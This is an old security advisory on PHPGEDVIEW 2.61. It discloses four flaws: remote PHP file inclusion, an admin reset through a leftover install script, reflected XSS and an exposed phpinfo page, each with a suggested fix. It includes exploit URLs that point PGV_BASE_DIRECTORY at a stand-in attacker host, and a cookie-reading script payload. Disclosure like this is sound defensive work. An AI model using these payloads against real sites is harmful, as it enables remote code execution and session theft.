phpgedview.txt

2004-01-08T00:00:00
ID PACKETSTORM:32471
Type packetstorm
Reporter Vietnamese Security Group
Modified 2004-01-08T00:00:00

Description

                                        
                                            `Tittle : Vuln in PHPGEDVIEW 2.61  
Lang : PHP   
Author : Windak  
Website: www.security.com.vn  
Version : PHPGEDVIEW 2.61 Multi-Problem  
  
Introduction :  
  
PHPGEDVIEW is program read projects GEDCOM file ( default html ) .  
  
Bug :   
  
1) Php code injection :   
  
Rick : Hight   
- Vuln in any files : functions.php, authentication_index.php ,config_gedcom.php   
  
In authentication_index.php file : at line 33 :   
  
require $PGV_BASE_DIRECTORY."authenticate.php";   
  
In functions.php file : at line 35 :   
  
require($PGV_BASE_DIRECTORY."functions_print.php");   
  
In config_gedcom.php file : at line 115 :   
  
if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php");   
else {   
$THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/";   
require($THEME_DIR."theme.php");   
  
  
Exploit :   
  
http://target/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http://attacker/   
http://target/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http://attacker/   
http://target/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://attacker/   
  
Script named authenticate.php put in http://attacker/ ( or functions_print.php , theme.php put in folder /themes/standard /  
  
FIX : add firt line files have been vuln : Require (config.php);   
  
2) Config again :   
rick: Medium   
If you not deleted editconfig.php file after install then attacker can reinstall and change password administrator .  
Link : http://target/phpgedview_folder/editconfig.php   
fix : Delete editconfig.php file  
  
3) XSS :   
Rick : medium   
  
Exploit :   
http://localhost/phpgedview/search.php?action=soundex&firstname="><script>alert(document.cookie)</script>   
  
fix :   
  
Find :   
<input type="text" name="firstname" value="<?php if ($action=="soundex") print $firstname; size="20" ?>" /></td></tr>   
<tr><td><?php print $pgv_lang["lastname_search"]?></td><td>   
<input type="text" name="lastname" value="<?php if ($action=="soundex") print $lastname; size="20" ?>" /></td></tr>   
<tr><td><?php print $pgv_lang["search_place"]?></td><td>   
<input type="text" name="place" value="<?php if ($action=="soundex") print $place; size="20" ?>" /></td></tr>   
<tr><td><?php print $pgv_lang["search_year"]?></td><td>   
<input type="text" name="year" value="<?php if ($action=="soundex") print $year; size="20" ?>" /></td></tr>   
  
replace with :   
  
<input type="text" name="firstname" value="" /></td></tr>   
<tr><td><?php print $pgv_lang["lastname_search"]?></td><td>   
<input type="text" name="lastname" value="" /></td></tr>   
<tr><td><?php print $pgv_lang["search_place"]?></td><td>   
<input type="text" name="place" value="" /></td></tr>   
<tr><td><?php print $pgv_lang["search_year"]?></td><td>   
<input type="text" name="year" value="" /></td></tr>   
  
4) Show info server :   
rick : low   
I can show info server   
Link: http://target/phpgedview_folder/admin.php?action=phpinfo   
  
fix :   
Find :   
  
if (!isset($action)) $action="";   
if ($action=="phpinfo") {   
phpinfo();   
exit;   
}   
  
if (!userIsAdmin(getUserName())) {   
header("Location: login.php?url=admin.php");   
exit;   
}   
  
replace with :   
  
if (!userIsAdmin(getUserName())) {   
header("Location: login.php?url=admin.php");   
exit;   
}   
if (!isset($action)) $action="";   
if ($action=="phpinfo") {   
phpinfo();   
exit;   
}   
  
=======================================================================  
Windak - Vietnamese Security Group  
  
www.security.com.vn   
`